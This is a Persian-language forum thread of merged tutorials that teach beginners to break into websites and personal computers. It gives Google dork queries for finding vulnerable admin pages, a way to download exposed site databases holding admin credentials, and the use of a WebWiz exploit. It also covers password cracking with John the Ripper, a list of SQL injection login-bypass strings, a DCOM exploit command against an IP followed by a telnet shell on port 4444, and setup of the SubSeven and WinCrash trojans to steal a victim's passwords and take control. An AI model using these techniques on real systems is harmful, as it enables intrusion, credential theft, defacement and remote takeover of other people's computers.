در درس بعدی (که خیلی توپه) در مورد کارکرد هر پورت و مسائل مربوط به ياهو مسنجر و کارت اينترنت رايگان (که البته هیچ کدوم از شما بهش علاقه ندارین)و اين جور مسائل توضيح می دم فقط يه نمه وقت می بره . اگه صبر کنين دارم يه ویژه نامه درباره شبکه و امنیت آن می نویسم که هر چی راجع به هک و کرک هم لازمه در بر می گیره . شما هم اگر بخواید می تونید کمکم کنید و همینطور از نظراتتون با اطلاعم کنید .

تا درس بعد همتون رو به خدا می سپارم . . . یا حق


ادغام شد.
Harry Potter

سلام
به عنوان اولین پستم در این انجمن میخوام حال اصاصی بدم و یاد بدم چجوری سایتهای خبری رو هک کنید.مراحلو همونجوری که میگم انجام بدید:
1-به گوگل برید و تایپ کنید: inurl:"/news/admin.htm
2-بعد از نمایش سایتها به صفحات آخر برید چون صفحات آخر اصیب پذیر ترن و از صفحات آخر یه سایتو انتخاب کنید
3-ساتی که مییاد آدرسش شبیه اینه: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] شما admin.htm رو پاک کن و به جاش بنویس news.mdb و اینتر کن بعد یه فایل شروع به دانلود شدن میکنه بزار دانلود بشه چون یوزر و پس ادمین سایت توشه.
4-دانلود که شد با نرم افزار اکسس مایکروسافت بازش کن و از قسمت تیبلها کانفیگوریشن رو انتخاب کن میبینی که یوزر و پسو بهت میده.
5- برو تو سایت یوزرو پسو بزن و حال کن :blush:
راستی این رو همه عملی نیست باید سعی کنی سایتهای اصیب پذیرو پیدا کنی مثلا تو گوگل بری صفحات آخر تا سایتهای آسیب پذیرو پیدا کنی :biggrin:

همونطوري که ميدونيد اخيرا يک باگ در WebWiz کشف شده.اين باگ توسط تيم ايراني با نام kapda کشف شده و اکسپلوييت اون هم توسط يکي از اعضاي اين گروه بانام devil_box نوشته شده.نسخه هاي آسيب پذير توسط اين اکسپلوييت :

webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions


ما براي نفوذ به سايتها بايد اين صفحه رو در اونا پيدا کنيم(سايتهايي که از WebWiz استفاده ميکنن)

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][product]/check_user.asp

که با استفاده از گوگل به راحت ميتونيد با يه سرچ ساده اينکارو بکنيد.

خب حالا بايد اکسپلوييت اين باگ رو از اینجا دريافت کنيد.

فايل htm رو توسط notepad بازش کنيد و در اون به دنبال اين عبارت بگرديد :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ][product]/check_user.asp

و به جاش آدرس صفحه مورد نظرتونو وارد کنيد.بعد save کنيد و با مرورگرتون باز کنيد صفحه htm رو.

حالا روي دکمه Submit کليک کنيد.اگه سايت patch شده باشه با يه error مواجه ميشيد.

خب ! کار نفوذ تموم شده.بقيش احتياج به توضيح نداره و با کمي ور ( var ) رفتن ميتونيد يه بلايي سر سايت بياريد.

از اين به بعد آموزش هايي اين وبلاگ رو ميخوام حرفه اي ترش کنم.

موفق باشيـــــــــــــــــــــ ـــــد :blush:

در اين آموزش شما مي آموزيد چگونه با يک سرچ قوي و سپس کرک کردن پسورد سايتها اقدام به نفوذ به سايت کنيد !

خب اول بايد به گوگل بريم و اين عبارت رو سرچ کنيم :

ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"

(براي کپي کردن بالاعبارت بالا به قسمت نظرات همين بخش مراجعه کنيد)

خب الان واستون هزاران لينک اومده که ما ميتونيم اونا رو .....

حالا روي يکي از لينکها کيليک کنيد.بعدش واستون يه صفحه تکست باز ميشه که در اون يوزر و پسورد سايت به صورت encode شده در اومده و بايد ما آنرا decode کنيم.خب اينجاست که بايد برنامه john رو داشته باشيد و طرز استفادش رو هم بلد باشيد.اما من با اين حال طرز کارش رو توضيح ميدم.من در اينجا به عنوان مثال john رو در اين آدرس از کامپيوترم ريختم : C:\John

حالا من پسورد سايت رو در يه فايل تکست ذخيره ميکنم و توي اين آدرس قرار ميدم :C:\john\run

پس آدرس فايل پسورد به اين صورت در مياد : C:\john\run\pass.txt

حالا که فايل رو قرار دادم به cmd ميرم و : cd c:\john\run

بعدش : john.exe pass.txt

بعدش شروع ميکنه به کرک کردن که شما منتظر ميمونيد تا کرک کنه....

حالا به FrontPage ميريد و : File > Open Web

بعدش آدرس سايت مورد نظر رو مينويسيم . بعد از ما يوزر و پسورد ميخواد که ما بايد يوزر و پسي رو که کرک کرديم بهش بديم !

خب کار ديگه تموم شده .... از اينجا به بعدش ديگه واقعا احتياجي به توضيي نداره چون کنترل کامل سايت دست شماست.

در ضمن برای آموزش بعدی یه چیز خیلی توپ رو در نظر گرفتم...حتما سر بزنید.

موفق باشيد دوستان ! :blush:

با سلام .امروز با استفاده از روشی ساده میخوام طرز هک کردن سایت رو بدم.فقط این نوع هک از نوع کیلوییه ! یعنی اینکه این جوریه که میرید یه عبارتو سرچ میکنید و بعد سایتهای که پیدا میشند رو میتونید هک کنید...

خب اول از همه شما باید برید اینو تو گوگل سرچ کنید : " login.asp "بعدش واستون کلی لینک میاره که شما باید سراغ لینکهایی برید که آدرسشون به این صورته : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] .خلاصه آخرش باید صفحه لوگین باشه.یه پیشنهادیم که بهتون میکنم اونم اینکه بیخیال صفحات اول شید...چون این لینکای این صفحات اکثراْ patch شدند.حالا یکی از اون لینکارو باز کنید.توش که برید میبینید که یه قسمت داره که ازتون Username و Password میخواد.حالا به جای یوزر بزنید : admin و به جای پسورد یکی از چیزای زیر رو بزنید :

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

(چون انتخاب متن رو قفل کردم و شما نمیتونید کپی کنید کدهای بالا رو من این کدها رو توی قسمت نظرات همین پست نوشتم که میتونید از اونجا برداریدشون)

یه چیزی اونم اینکه همیشه نباید اینجوری بزنید بعضی وقتا توی همه یوزر و هم پسورد از یکی از حرفای بالا استفاده کنید.همون طوری که دیدید این یه روش خیلی سادس فقط به این هم توجه داشته باشید که اگه یه بار کارای بالا رو انجام دادید و لوگین نشدید بیخیا اینجا نشید.همون طوری که گفتم یه روش ابتکاریه.امتحان کنید حتما جواب میده ( اگه پچ نشده باشه )

یه چیز دیگه اونم اینکه بعضیا میان میپورسن : حالا فرضاْ ما لوگین شدیم.بعدش باید چیکار کنیم ؟ در جواب باید بگم که در این نوع هک شما بعد اینکه هک کردید باید برید دنبال گزینه هایی مثل : " درج خبر جدید " یا "Send New Post "و بعدش هم که اینجا رفتید دیگه کاملا مشخصه!یه جا باید متن خبر رو بنویسید و یه جا هم داره که تاریخ خبر و یه جا هم عنوان خبر و .... که مشخصه.

خب اینم تموم شد.تا آموزش بعدی خداحافظ :blush:

با استفاده از این مقاله شما میتوانید با بدست آوردن آیپی کلاینت به آن سیستم حمله کرده و با استفاده از باگ موجود در ویندوز اکس پی کنترل کامل سیستم قربانی را بدست بگیرید

از اینجا شروع میکنم که شما برای اینکار به ۲ چیز احتیاج دارید.۱-ایپی و دومی32 DCOM که میتونید اونو میتونید با سرچ تو گوگل پیدا کنید.خب حالا فایل رو بعد اینکه دانلود کردید در درایو ویندوز خود کپی کنید.یعنی :

X:\Documents and settings\"USER"\Here

به جای ایکس نام درایوی که ویندوز در آن ریخته شده و به جای یوزر نام یوزر ویندوز خود را بگزیرید و در همان جا کپی کنید.بعدش وارد cmd شید و بنویسید dcom32 .بعدش شکل زیر ظاهر میشه که من مطابق شمل توضیح میدم :

همونطوری که در شکل بالا هم میبینید الان داره از شما سوال میشه که ویندوز کسی که میخواید هک کنید و الای ایپی اونو دارید چیه؟خب در اینجا بهتون گفته شده که اگه ویندوز طرف :

Windows 2000 service pack 0=====>0

windows 2000 servise pack 1=====>1

windows 2000 servise pack 2 =====>2

&....

رو فشار بدید.الان مثلا کسی که من میخوام هک کنم از ویندوز XP servise pack 0 هست پس بنابراین من الان بره هک من باید از سوییچ ۵ استفاده کنم. همونطوری که در شکل هم میبیند باید این دستور رو وارد کنم:

یعنی: dcom32 5 217.218.166.135

خب بعد اینکه اینو تایپ کردید مطابق شکل بهتون گفته میشه که الان شما پورت ۴۴۴۴ رو رو سیستم قربانی باز کردید و گقته میشه که با نت کت به سیستم وصل شید و ... ولی چون نت کت هنوز بره اینکه اینجا اموزشش داده شه زوده شما میتونید به پورت ۴۴۴۴ طرف Telnet کنید ... که بره اون به run برید و بعد cmd رو تایپ کنید و بعد به این صورت:telnet 217.218.166.135 4444

بعدش شل سیستم طرف بره شما باز میشه و دیگه هر کاری که عشقتون میکشه میتونید رو سیستم بکنید.انشاالله اینکه با شل چیکار کنیدو براتون بعدن توضیح میدم چون اصلا بحثش جداست.خب امید وارم که اینایی که نوشتم به دردتون بخوره.پیشنهاد من به شما اینه که حتما این چیزایی رو که من در این مقاله و مقاله های قبلی گفتمو امتحان بکنید تا براتون جا بیفته.خب من دیگه برم.

منتظر مقالات من باشیـــــــــــــــــــــ ــــــــد ! با

پروتکل tcp/ip:اين پروتکل يکی از مهمترين و جزوء پر امنيت ترين پروتکل ها است و برا اساس روش تبديل داده ها به ديتاگرام است يعنی داده ها را به بسته های کوچکی تبديل کرده و آن را به صورت مستقل به مقصد می رساند و هر بسته حاوی آدرس فرستنده و گيرنده است.اين پروتکل بيشترين استفاده را در هک دارد
پروتکل [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] اين پروتکل نيز جزء مهمترين پروتکل های ارتباطی است اين پروتکل که بر روی پورت ۸۰ سوار است قابليت stateless دارد و بدون هيچ تماسی بين کامپيوتر ميزبان و سرور است
پروتکل ftp:اين پروتکل برای فرستادن و گرفتن فايل به کار می رود اين پروتکل بر روی پورت ۲۱ سوار بوده و سعی می کند تا فايل ها را به صورت يک جا به مقصد ارسال کند
پروتکل usenet : اين پروتکل بيشتر برای سازمان های خصوصی و ارتباط ها جمعی بين گرو ههای خبری است
پروتکل gopher : اين پروتکل از نوع قديمی پروتکل http است و در اين نوع پروتکل کامپيوتر ميزبان می تواند به کامپيوتر سرور ارتباط بر قرار کرده و تبادل اطلاعات کند
پروتکل telnet: اين نوع پروتکل برای ورود به کامپيوتر های ديگر است اين پروتکل بر روی پورت ۲۳ سوار بوده و قابليت تعويض را نيز دارد.

ساب سون چيست؟ساب سون يکی از نرم افزارهای تارجان است که هنگامی برای فرد مورد نظر فرستاده می شود و شخص مورد نظر آن فايل را اجرا نمود پورتی به خصوص در کامپيوتر ان فرد باز نموده(backdoor)و آن پورت باز و شماره آی پی آن را برای شما ارسال می کند بعد از آن شما با نوشتن شما رهای فرستاده شده توسط کلينيت شما می تاونيد کامپيوتر آن فرد را در اختيار کامل بگيريد
آموزش کار :شما ابتدا نرم افزار را از اينجا دريافت نموده و در فايل ساب سون برنامه ی Edit server را اجرا نموده و در کادر باز شده In normal mode را انتخاب نموده و در پنجر ه ی باز شده notifection را انتخاب نموده و بر روی دکمه ی add email notify کليک کرده و در کادر باز شده ايميل خود را می نويسيد و دکمه ی ok را می زنيد بعد گزينه ی
email را انتخاب کرده و در بخش آن تمامی گزينه ها را فعال نموده و سپس در تمامی کادرها ايميل خود را می نويسيد تا هنگامی آن فرد فايل را باز نمود تمامی پسوردهايش برای شما ارسال گردد.و سپس گزينه ی exe icon/other را انتخاب نموده و گزينه ی enable fake error message را فعال کرده و در دکمه ی کنار آن يعنی configure error message کليک کرده و در پنجره ی باز شده در قسمت text پيغامی بنويسيد تا وقتی بر روی فايل فرد مورد نظر کليک کرد پيغامی که شما نوشته ايد نمايش دهد بعد پيغام را نوشته و بر روی دکمه ی ok کليک نموده و گزينه ی change icon server را فعال کرده و يکی از آيکن ها را انتخاب نماييد سپس بر روی دکمه ی ...save as کليک کرده و مقصدی را که می خواهيد اين فايلی که ساخته ايد در آنجا ذخيره شود را انتخاب نموده و سپس در قسمت file name نام مورد نظر خود را برای اين فايل به همراه پسوند exe. نوشته و سپس بر روی دکمه ی save کليک نموده و سپس فايل ساخته شده را برای شخص قربانی بفرسيد.سپس بعد از گذشت چند دقيقه که شخص فايل را دريافت نمود و ان را اجرا نمود شماره ی آی پی و ورت آن شخص برای شما فرستاده می شود بعد شما بايد برنامه ی sub7را اجرا کنيد و در قسمت ای ی ,ای پی شخص مورد نظر و در قسمت پورت , پورت شخص مورد نظر را نوشته و سپس بر روی دکمه ی coneect کليک نماييد حال شما به کامپيوتر شخص مورد نظر متصل شده ايد و می توانيد و در قسمت سمت چپ که اولين کلمه ی آن را shorcots نوشته می توانيد تمامی نقشه ها ی شيطانی و پست خود را روی شخص مورد نظر انجام دهيد مثل پاک کرده فايل های آن يا تحت اختيار گرفتن موس يا کيبورد ان شخص .اميدورام از درس امروز نيز خوشتان آمده باشد تا درس ديگر شما منتظر من بمانيد اما خودمونيم نامرد کسی است که نظر نده



خدانگهدارتان دانلود ساب سون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

ما در دنيای اينترنت ۲ نوع پورت داريم يکی پورت فيزيکی و ديگری پورت مجازی

پورت فيزيکی: اين گونه پورت ها پورت هايی هستند که می توان آنها را لمس کرد و ديد

پورت مجازی:اين گونه پورت ها که از اسمشون معلوم است در دنيای مجازی است و ما نمی توانيم آنها را ببينيم که چه برسه بخواهيم لمسش کنيم

اما ما هکر ها برای هک کردن وب و اشخاص از پورت مجازی استفاده می کنيم و تعداد اين پورتها ۶۵۰۰۰تا است که از پورت Reserved tcp/0شروع و با پورت Devilخاتمه می يابد . ما برای هك كردن بايد يك يا چند پورت باز در كامپيوتر فرد ياوب مورد نظر پيدا كنيم تا بتوانيم از همان پورت باز به او حمله كنيم.ما برای به دست آوردن پورت های باز بايد از نرم افزار ها ی پورت اسكنر استفاده كنيم كه اين پورت اسكنر ها به دو دسته ‎ير قابل تشخيص و قابل تشخيص دسته بندی می شوند

پورت اسكنرها ی غير قابل تشخيص:اين پورت اسكنرها كه از اسمشان معلوم است قابل ردياببی نيستند چون اگر آی اس پی يا سايتی كه شما می خواهيد هكش كنيد بفهمد كه شما داريد پورت های آن را اسكن می كنيد كارت شما را قطع كند يا وقتی كه شما وب را هك كرديد بتوانند به راحتی به شما دسترسی داشته باشند من پيشنهاد می كنيم كه از اين پورت اسكنرها استفاده نماييد

پورت اسكنر های قابل تشخيص:اين پورت اسكنرها به راحتی قبل تشخيص بوده و شما اگر وبی را هك كنيد آنها می توانند به شما دسترسی داشته باشند

نكته: حالا بعضی ها كه دنبال مشهور شدن هستند از پورت اسكنر های قابل تشخيص استفاده می كنند تا بعد از هك جاي مورد نظر هنگامی كه آنها را گرفتند در تلويزيون از آنها به عنوان هكر سال شناخته بشود ام اين چه فايده ای دارد چون يه روز مشهور می شويد و در عوض ۱ يا ۱۰ سال بايد در زندان بمانيد و جريمه هايی كه تازه دولت برای هكرها تعيين كرده است را بپردازيد كه اين جريمه ها از ۵۰۰ هزار تومان است تا ۱۰ ميليون

حال می رويم برای چگونه پورت های باز را اسكن كنيم شما بايد ابتدا آدرس آی پی وب يا كامپيونر مورد نظر را در داخل يك اسكنر غير قابل تشخيص مثل nmap نوشته و در كادر ديگر آن تعداد پورت هايی كه می خواهيد اسكن كنيد را بنوسيد بعد به روی دكمه ی استارت كليك كرده تا نرم افزار اسكنر پورت های باز را به شما نشان دهد من در آخر اين درس نرم افزار nmap كه از طريق خط فرمان داس اجرا می شود را برای شما به دانلود گذاشته ام كه شما بتوانيد آن را دريافت و از ان استفاده نماييد

چگونگی اجرای برنامه ی nmap از طريق خط فرمان داس

ابتدا بر برنامه ی داس را اجرا كرده و نام درايوی كه برنامه ی nmap را در آنجا ذخيره كرده ايد وارد نماييد سپس نام فايل و نام برنامه را بنويسيد و بر روی دكمه ی اينتر بزيند مثال: مثلا من برنامه ی nmap ار در درايو e خود به نام فايل saiedhackerذخيره كرده ام پس من می روم و در داس چنين می نويسم

:e

cd saiedhacker

nmap

حال اگر بخواهيم از برنامه ی nmap راهنمايی بگيرم وقتی برنامه ی آن را اجرا كرديم می نويسيم

nmap -h

اميدوارم از درس امروز نيز خوشتان آمده باشد پس تا درس ديگر شما را به خدا می سپارم .

دانلود ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

خداحافظ :blush:


ادغام شد.
Harry Potter

امروز علاقمندان به اينترنت در هر گروه سني و هر مكاني يافت مي شوند و اينترنت نه فقط به عنوان يك ابزار تحقيق و جستجو و وسيله تبادل اطلاعات، بلكه به عنوان يك وسيله سرگرمي و تفريح و پرنمودن اوقات بيكاري ، تماس با آشنايان و يافتن دوستان جديد و دهها مورد ديگر،مورد استفاده قرار مي گيرد .اهدافي كه امروز مورد نظر بسياري از كاربران اينترنت است، شايد در بدو ايجاد اين شبكه جهاني، هيچگاه به ذهن طراحان آن هم نرسيده است؟!
امروزه ، اينترنت دوست و همدم افرادي شده است كه بعد از ساعتها كار روزانه ، براي فراموش كردن مشكلاتي كه در طول روز با آن مواجه بوده اند و يا براي فرار از اضطراب و نااميدي كه از اثرات زندگي مدرن است و يا يافتن دوستاني جديد، بدون درگير شدن در واقعيات دنياي حقيقي ، به دنياي مجازي يا سايبر اسپيس روي مي آورند.
سايبر اسپيس يا دنياي مجازي كه از آن با عنوان اينترنت نام مي بريم ، امروزه تنها مكاني است كه هر كس مي تواند بدون شناخته شدن و بدون نياز به ارائه هرگونه اطلاعات حقيقي و مستند راجع به خود، وارد آن شود.
دنياي مجازي از دنياي حقيقي چيزي كم ندارد و از اين به بعد، علاوه بر يك شخصيت واقعي كه متعلق به دنياي واقعي ( Real Space) شماست ، مي توانيد شخصيتهاي مختلفي نيز در دنياي مجازي (Cyber Space) داشته باشيد.
يكي از پرمخاطب ترين و پرطرفدارترين بخشهاي موجود در اينترنت ، اتاقهاي گفتگو (Chat Rooms) هستند كه مي توان بدون ارايه هويت واقعي به آنها وارد شد .در اين اطاقها اگر بتوانيد به گفته هاي افراد در رابطه با خودشان ، اطمينان كنيد، خواهيد توانست يك رابطه دوستانه را پايه گذاري كنيد، در غير اين صورت بايد قيد ورود به اين اتاقها را بزنيد .
همان طور كه زندگي در دنياي واقعي، پر از خطرات گوناگون است، دنياي مجازي نيز خالي از خطر نيست. پس بايد در اين مسير مراقب باشيد و بي محابا دست به هر اقدامي نزنيد.
در دنياي مجازي نيز شما مجبور هستيد از حريم شخصي خودتان محافظت كنيد و راه دسترسي غريبه ها را به اين حريم ببنديد. مسلما در هر لحظه ، افراد فراواني تمايل به دسترسي و ورود به سيستم شما، جهت يافتن اطلاعات مورد نظرشان را دارند. البته براي اين عمل، انگيزه هاي فراواني وجود دارد .پس مراقب هكرها باشيد.
نفوذگر يا هكر در واقع كسي است كه از تخصص خود در زمينه كامپيوتر براي كارهاي ممنوع استفاده مي كند، چنين كسي بدون مجوز وارد سيستم كامپيوتري سايرين مي شود و برنامه و داده ها را زير و رو مي كند .ممكن است تاكنون به همچنين موردي برخورد نكرده باشيد، ولي دير يا زود بايد منتظر ورود اين افراد باشيد، به خصوص اگر وقت زيادي را در اتاقهاي گفتگو صرف مي كنيد، بيشتر بايد دقت كنيد.
در اين مقاله قصد داريم نرم افزاري با نام WinCrash را به شما معرفي كنيم .اين نرم افزار يكي از پرطرفدارترين نرم افزارهايي است كه توسط هكرهاي آماتور و تازه كار مورد استفاده قرار مي گيرد.
اين برنامه داراي يك رابط گرافيكي بسيار ساده است .به طوري كه استفاده از آن حتي از برنامه Paint ويندوز هم راحتتر است .همين امر، دليل محبوبيت اين نرم افزار در ميان هكرهاست .
برنامهWinCrash ، مانند اكثر برنامه هاي مشابه خود از قبيل . . ، SubSeven ،Girlfriend ،NetBusProبه يك فايل سرويس دهنده به نام Server.Exe بر روي كامپيوتر ميزبان احتياج دارد.
براي استفاده از اين برنامه ابتدا بايد آن را بر روي كامپيوتر خود نصب كنيد، بعد از انجام مراحل نصب و راه اندازي برنامه ، دو فايل اصلي برنامه با نامهاي Server.exe و Client.exe در اختيار شما قرار مي گيرند.
فايل (Server.exe) همان فايلي است كه بايد به كامپيوتر مورد نظر انتقال يابد و يك بار نيز اجرا شود .معمول ترين روش براي ارسال اين فايل ، كه يك فايل Trojan اسب تروا است ، انتقال آن به كامپيوتر ميزبان توسط يك برنامه (Instant Messenger) IM ، از قبيلYahoo messenger ،MSN Messenger،Odigo ، ICQ و . . .است ، اگراين فايل به صورت پيوست يك نامه الكترونيكي (attachment) ارسال شود .اكثر سرورهاي پستي (mail servers) داراي يك نرم فزارشناسايي ويروس هستند كه قبل از down Load كردن فايل ، امكان بازرسي آن را به كاربر مي دهند .در اين حالت فايل توسط نرم افزار ضدويروس ، به عنوان يك فايل آلوده يا اسب تروا شناسايي مي شود،اما مي توان به راحتي در هنگام استفاده از نرم افزارهايIM ، فايل Server.exe را تغيير نام داد بدون اينكه در عملكرد فايل تغييري حاصل شود (و به عنوان يك فايل گرافيكي مثل تصوير خودتان و يا به جاي فايل درخواست شده توسط طرف مقابل ، معرفي كرده و آن را به كامپيوتر او منتقل كرد .
اين فايل كه حدود 330 كيلوبايت حجم دارد، به وسيله نرم افزارهاي IM و بدون هيچ گونه بازرسي ، به كامپيوتر مقابل DownLoad شده و به محض اجرا شدن توسط كاربر و بدون بروز هيچ گونه علامتي ، فايل Server.exe بر روي آن كامپيوتر نصب مي شود .اين فايل به محض اجرا، يك كپي از خود را در شاخه اصلي ويندوز قرار مي دهد و به منظور اجرا شدن خودكار فايل در هر مرتبه بالا آمدن سيستم عامل ، مسير خود رادر مكانهاي گوناگوني مانند فايل win.iniدر شاخهWindows ، در دستور Runو يا در رجيستري ويندوز در آدرس زير
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run
حك مي كند كه البته تمامي اين عمليات بسيار سريع و كاملا در پشت صحنه اتفاق مي افتد، بدون اينكه كاربر كوچكترين نشانه اي از اين عمليات را مشاهده كند .حتي جالبتر اين نكته است كه وقتي كاربر، توسط كادر) close program با زدن كليدهاي (Ctrl+Alt+Del برنامه هاي باز در سيستم عامل را مشاهده مي كند، هيچ نشاني از اجرا شدن اين فايل نمي يابد.
در اين مرحله ، كامپيوتر سرويس دهنده آماده استفاده است .
توجه :اجراي فايل Server.exe بر روي هر كامپيوتري ، آن را مستعد ورود تمامي هكرهايي مي كند كه از برنامه Wincrash استفاده مي كنند، مگر اينكه فايل Server.exe توسط هكر به كلمه عبور، مجهز شده باشد.
اكنون بايد ارتباط برقرار شود .براي اين عمل ، به آدرس IPدستگاه مقابل ، احتياج داريم .با وجودي كه آدرس IP در هر مرتبه اتصال دستگاه به اينترنت ، متفاوت است ، ولي در مجموع يافتن آن كار بسيار ساده اي است. فقط به ذكر همين نكته اشاره مي كنيم كه باايجاديك ارتباط مستقيم(Direct connection) ، به راحتي مي توان از طريق اجراي فرمان Netstart در خط فرمان ويندوز به Foreign IP Address كه آدرس IPكامپيوتر طرف دوم است ، دست پيدا كرد .اين فرمان معمولا در ارتباطهايي كه در پورت هاي 5050 و يا در اين حدود برقرار شده است ، دقيق ترين آدرس IPرا از كامپيوتر سرور نمايش مي دهد .
ساده ترين روش براي برقراري يك ارتباط مستقيم(Direct connection) ،انتقال فايل است و مطمئنا زمان انتقال فايل Server.exe روي كامپيوتر مقابل ، زمان مناسبي براي هك كردن آدرس IP سيستم مورد نظر است .
هم اكنون همه چيز آماده است. براي وارد شدن به كامپيوتر سرور و زير و رو كردن داده ها و برنامه هاي آن ، كافي است برنامه كلاينت WinCrash فايل Client.exeرا اجرا كنيد و در كادرTarget IP، آدرس IPكامپيوتر سرور را وارد كنيد و سپس دكمه Connect to host را فشار دهيد .پس از چند لحظه تامل، ارتباط شما با كامپيوتر سرور برقرار شده و كنترل آن در دست شما قرار مي گيرد و شما به تمامي منابع آن دسترسي خواهيد داشت. توجه داشته باشيد كه به وسيله دكمهDisconnect From Host ، مي توانيد ارتباط خود را با سرور قطع كنيد
حملات یک هکر
بسياري از كاربران كامپيوتر نمي دانند كه كامپيوترشان حتي وقتي خاموش است ، در مقابل حملات نفوذگران بسيار آسيب پذير است .داشتن نرم افزارهاي ضد ويروس به تنهايي كافي نيست .مكانيزم دفاعي شما بايد در تمامي ساعاتي كه كامپيوترتان روشن است فعال باشد، در غير اين صورت ، امكان نفوذ در كامپيوترتان وجود دارد .اغلب اتفاق مي افتد كه كاربران با اين تصور كه مقدار زيادي از حجم حافظه دستگاهشان اشغال مي شود، نرم افزار ضد ويروس خود را غيرفعال مي كنند .اما اين راه حل خوبي نيست .آنها بهتر است به جاي غيرفعال كردن نرم افزار ضدويروس ، حجم حافظه كامپيوتر خود را افزايش دهند.
.([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] MemoryCalculator.DestinationAt.com)
اگر كامپيوتر شما به اينترنت يا شبكه ديگري متصل است ، در عمل بدون آنكه متوجه باشيد در معرض خطر نفوذ يا استفاده غير مجازهستيد
.([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] FreeFormHackers .Destination At.com)
آيا كامپيوتر شما به هنگام خاموش بودن ، واقعا خاموش است ‚ اگر اجازه دهيد كه كامپيوترتان خود به خود در حالت قرار گيرد يا اگر از منوي Start براي خاموش كردن آن استفاده كنيد، ممكن است كامپيوترتان با تلاشهاي يك نفوذگر براي يافتن درگاههاي باز،> دوباره بيدار <شده و تمام گنجينه هاي خود را در دسترس او قرار دهد .فقط قطع برق كامپيوتر به صورت دستي ، از ورود نفوذگران خارجي يا سازماني به كامپيوترتان ممانعت به عمل مي آورد .بنابراين هميشه به ياد داشته باشيد كه در پايان كار، هميشه سويچ قطع برق را كه بين كامپيوترتان و پريز برق قرار گرفته فشار دهيد
چه خطراتي از جانب نفوذگران شما را تهديد مي كند؟
نفوذگران به روشهاي زير، كامپيوتر شما را در معرض خطر قرار مي دهند 1- به سرقت بردن اطلاعات شما، 2- تغيير در اطلاعات خصوصي يا شركتي شما 3- كاشتن ويروس ها، كرمهاي كامپيوتري يا اسبهاي تراوا در كامپيوتر شما 4- باقي گذاردن ابزارهاي كنترل يا كوكي هايي به كامپيوتر شما، جهت ارسال اطلاعات شخصي و خصوصي شما به كامپيوترهاي ديگر 5- بازي كردن نقش شما با اين هدف كه شما را براي اعمال خود مقصر جلوه دهند.
وقتي به اينترنت متصل هستيد، بايد از كامپيوترتان محافظت كنيد .كساني كه اتصالاتشان با اينترنت هميشه برقرار است ، مثل آنهايي كه خط DSL يا T1 دارند يا از طريق شبكه هاي LAN يا WAN به اينترنت متصل مي شوند، مي توانند هميشه كامپيوترشان را روشن نگاه داشته و به اينترنت هم متصل باقي بمانند .اما همين امتياز باعث آسيب پذيري دستگاه آنها مي شود .نرم افزارهاي رايگان يا ارزان قيمت ، به راحتي در دسترس كساني كه از طريق اتصال اينترنتي شما درصدد نفوذ به كامپيوترتان هستند، قرار مي گيرند و اغلب براي اين منظور از نرم افزارهاي پيام رساني همچونAOL Instant Messenger ، Yahoo Messenger ، ICQو ساير نرم افزارهاي پيام رساني فوري ، استفاده مي كنند .نفوذگران مي توانند از طريق استفاده از يك پويشگر سريع و پيشرفته ، تمام درگاههاي باز كامپيوترهاي متصل به اينترنت را در سراسر جهان تشخيص دهند و از اتصال يا عدم اتصال شما به اينترنت مطلع شوند .
([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ShieldsUp.DestinationAt.com)
در اغلب موارد، نفوذ هنگامي اتفاق مي افتد كه كامپيوتر شما روشن است ولي كاري انجام نمي دهد .بعضي از نرم افزارها مي توانند تمام برنامه هاي شما را جستجو كنند و كلمات عبور و ليست شماره تماسها را به دست آورده و سپس از نام شما سوء استفاده كنند و در وب، شما را به جاي شخص ديگري معرفي كنند .به عبارت ديگر، نفوذگران مي توانند از كامپيوتر شما، براي انجام كارهاي مخفيانه و غير مجاز استفاده كنند و به كمك نرم افزار ارتباطي ، شما را به جاي خود معرفي كرده و بدون آنكه متوجه باشيد، مسووليت اعمال خود را به گردن شما بيندازند ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) .اگر از نرم افزارهاي پيشگيري نظير ديوار آتش و ضد ويروس استفاده نكنيد، خطرات بالا شما را تهديد مي كند .
([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] Hackers.DestinationAt.com,
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] Blocker.Destination At.com)
روشي آسان براي آزمايش Online در گامهاي خود در صفحه Shields-Up استيو گيبسون در سايت :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]، مي توانيد دلايل كافي براي استفاده از حداقل يك ديوار آتش( يا دو ديوار آتش ، در صورت عدم دسترسي به بهترين نوع ديوار آتش ) را بيابيد

port چيست ؟
